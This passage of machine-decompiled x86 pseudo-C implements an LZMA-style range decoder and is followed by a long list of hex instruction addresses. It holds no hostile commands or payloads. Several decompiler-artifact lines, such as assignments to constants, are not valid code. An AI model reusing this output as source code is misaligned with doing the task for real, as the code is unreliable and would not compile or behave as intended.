											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                    0x00000000
                                                    0x00407395
                                                    0x00407395
                                                    0x00407399
                                                    0x004073be
                                                    0x004073c8
                                                    0x00000000
                                                    0x0040739b
                                                    0x0040739b
                                                    0x0040739e
                                                    0x004073a2
                                                    0x004073a5
                                                    0x004073a8
                                                    0x004073ac
                                                    0x004073ac
                                                    0x004073af
                                                    0x00407489
                                                    0x00407489
                                                    0x00407490
                                                    0x00407490
                                                    0x00407493
                                                    0x0040749a
                                                    0x004074c7
                                                    0x004074cb
                                                    0x0040752b
                                                    0x0040752e
                                                    0x00407533
                                                    0x00407534
                                                    0x00407536
                                                    0x00407538
                                                    0x0040753b
                                                    0x00407447
                                                    0x00407447
                                                    0x00407447
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406bec
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2
                                                    0x00000000
                                                    0x00406bfd
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c06
                                                    0x00406c09
                                                    0x00406c0c
                                                    0x00406c10
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c16
                                                    0x00406c19
                                                    0x00406c1b
                                                    0x00406c1c
                                                    0x00406c1f
                                                    0x00406c21
                                                    0x00406c22
                                                    0x00406c24
                                                    0x00406c27
                                                    0x00406c2c
                                                    0x00406c31
                                                    0x00406c3a
                                                    0x00406c4d
                                                    0x00406c50
                                                    0x00406c5c
                                                    0x00406c84
                                                    0x00406c86
                                                    0x00406c94
                                                    0x00406c94
                                                    0x00406c98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00406c8b
                                                    0x00406c8c
                                                    0x00406c8c
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c62
                                                    0x00406c67
                                                    0x00406c67
                                                    0x00406c70
                                                    0x00406c78
                                                    0x00406c7b
                                                    0x00000000
                                                    0x00406c81
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c9e
                                                    0x00406c9e
                                                    0x00406ca2
                                                    0x0040754e
                                                    0x00000000
                                                    0x0040754e
                                                    0x00406cab
                                                    0x00406cbb
                                                    0x00406cbe
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc4
                                                    0x00406cc8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cca
                                                    0x00406cd0
                                                    0x00406cfa
                                                    0x00406d00
                                                    0x00406d07
                                                    0x00000000
                                                    0x00406d07
                                                    0x00406cd6
                                                    0x00406cd9
                                                    0x00406cde
                                                    0x00406cde
                                                    0x00406ce9
                                                    0x00406cf1
                                                    0x00406cf4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d39
                                                    0x00406d3f
                                                    0x00406d42
                                                    0x00406d4f
                                                    0x00406d57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0e
                                                    0x00406d0e
                                                    0x00406d12
                                                    0x0040755d
                                                    0x00000000
                                                    0x0040755d
                                                    0x00406d1e
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d2c
                                                    0x00406d2f
                                                    0x00406d32
                                                    0x00406d37
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073d4
                                                    0x004073da
                                                    0x004073e0
                                                    0x004073fa
                                                    0x004073fd
                                                    0x00407403
                                                    0x0040740e
                                                    0x0040740e
                                                    0x00407410
                                                    0x004073e2
                                                    0x004073e2
                                                    0x004073f1
                                                    0x004073f5
                                                    0x004073f5
                                                    0x0040741a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040741c
                                                    0x00407420
                                                    0x004075cf
                                                    0x00000000
                                                    0x004075cf
                                                    0x0040742c
                                                    0x00407433
                                                    0x0040743b
                                                    0x0040743e
                                                    0x00407441
                                                    0x00407441
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d5f
                                                    0x00406d61
                                                    0x00406d64
                                                    0x00406dd5
                                                    0x00406dd8
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406dec
                                                    0x00000000
                                                    0x00406dec
                                                    0x00406d66
                                                    0x00406d6a
                                                    0x00406d6d
                                                    0x00406d6f
                                                    0x00406d72
                                                    0x00406d75
                                                    0x00406d77
                                                    0x00406d7a
                                                    0x00406d7c
                                                    0x00406d81
                                                    0x00406d84
                                                    0x00406d87
                                                    0x00406d8b
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9c
                                                    0x00406da0
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406dac
                                                    0x00406daf
                                                    0x00406dcd
                                                    0x00406dcf
                                                    0x00000000
                                                    0x00406db1
                                                    0x00406db1
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc4
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00406ffe
                                                    0x00407002
                                                    0x00407020
                                                    0x00407023
                                                    0x0040702a
                                                    0x0040702d
                                                    0x00407030
                                                    0x00407033
                                                    0x00407036
                                                    0x00407039
                                                    0x0040703b
                                                    0x00407042
                                                    0x00407043
                                                    0x00407045
                                                    0x00407048
                                                    0x0040704b
                                                    0x0040704e
                                                    0x0040704e
                                                    0x00407053
                                                    0x00000000
                                                    0x00407053
                                                    0x00407004
                                                    0x00407007
                                                    0x0040700a
                                                    0x00407014
                                                    0x00000000
                                                    0x00000000
                                                    0x00407068
                                                    0x0040706c
                                                    0x0040708f
                                                    0x00407092
                                                    0x00407095
                                                    0x0040709f
                                                    0x0040706e
                                                    0x0040706e
                                                    0x00407071
                                                    0x00407074
                                                    0x00407077
                                                    0x00407084
                                                    0x00407087
                                                    0x00407087
                                                    0x00000000
                                                    0x00000000
                                                    0x004070ab
                                                    0x004070af
                                                    0x00000000
                                                    0x00000000
                                                    0x004070b5
                                                    0x004070b9
                                                    0x00000000
                                                    0x00000000
                                                    0x004070bf
                                                    0x004070c1
                                                    0x004070c5
                                                    0x004070c5
                                                    0x004070c8
                                                    0x004070cc
                                                    0x00000000
                                                    0x00000000
                                                    0x0040711c
                                                    0x00407120
                                                    0x00407127
                                                    0x0040712a
                                                    0x0040712d
                                                    0x00407137
                                                    0x00000000
                                                    0x00407137
                                                    0x00407122
                                                    0x00000000
                                                    0x00000000
                                                    0x00407143
                                                    0x00407147
                                                    0x0040714e
                                                    0x00407151
                                                    0x00407154
                                                    0x00407149
                                                    0x00407149
                                                    0x00407149
                                                    0x00407157
                                                    0x0040715a
                                                    0x0040715d
                                                    0x0040715d
                                                    0x00407160
                                                    0x00407163
                                                    0x00407166
                                                    0x00407166
                                                    0x00407169
                                                    0x00407170
                                                    0x00407175
                                                    0x00000000
                                                    0x00000000
                                                    0x00407203
                                                    0x00407203
                                                    0x00407207
                                                    0x004075a5
                                                    0x00000000
                                                    0x004075a5
                                                    0x0040720d
                                                    0x00407210
                                                    0x00407213
                                                    0x00407217
                                                    0x0040721a
                                                    0x00407220
                                                    0x00407222
                                                    0x00407222
                                                    0x00407222
                                                    0x00407225
                                                    0x00407228
                                                    0x00000000
                                                    0x00000000
                                                    0x00406df8
                                                    0x00406df8
                                                    0x00406dfc
                                                    0x00407569
                                                    0x00000000
                                                    0x00407569
                                                    0x00406e02
                                                    0x00406e05
                                                    0x00406e08
                                                    0x00406e0c
                                                    0x00406e0f
                                                    0x00406e15
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e1a
                                                    0x00406e1d
                                                    0x00406e1d
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e29
                                                    0x00406e2f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e35
                                                    0x00406e35
                                                    0x00406e39
                                                    0x00406e3c
                                                    0x00406e3f
                                                    0x00406e42
                                                    0x00406e45
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4b
                                                    0x00406e51
                                                    0x00406e54
                                                    0x00406e57
                                                    0x00406e5a
                                                    0x00406e5d
                                                    0x00406e60
                                                    0x00406e63
                                                    0x00406e7f
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e88
                                                    0x00406e8f
                                                    0x00406e93
                                                    0x00406e95
                                                    0x00406e99
                                                    0x00406e65
                                                    0x00406e65
                                                    0x00406e69
                                                    0x00406e71
                                                    0x00406e76
                                                    0x00406e78
                                                    0x00406e7a
                                                    0x00406e7a
                                                    0x00406e9c
                                                    0x00406ea3
                                                    0x00406ea6
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eb1
                                                    0x00406eb1
                                                    0x00406eb5
                                                    0x00407575
                                                    0x00000000
                                                    0x00407575
                                                    0x00406ebb
                                                    0x00406ebe
                                                    0x00406ec1
                                                    0x00406ec5
                                                    0x00406ec8
                                                    0x00406ece
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed3
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406edc
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ede
                                                    0x00406ee1
                                                    0x00406ee4
                                                    0x00406ee7
                                                    0x00406eea
                                                    0x00406eed
                                                    0x00406ef0
                                                    0x00406ef3
                                                    0x00406ef6
                                                    0x00406ef9
                                                    0x00406efc
                                                    0x00406f14
                                                    0x00406f17
                                                    0x00406f1a
                                                    0x00406f1d
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f24
                                                    0x00406f26
                                                    0x00406efe
                                                    0x00406efe
                                                    0x00406f06
                                                    0x00406f0b
                                                    0x00406f0d
                                                    0x00406f0f
                                                    0x00406f0f
                                                    0x00406f29
                                                    0x00406f30
                                                    0x00406f33
                                                    0x00000000
                                                    0x00406f35
                                                    0x00000000
                                                    0x00406f35
                                                    0x00406f33
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f75
                                                    0x00406f75
                                                    0x00406f79
                                                    0x00407581
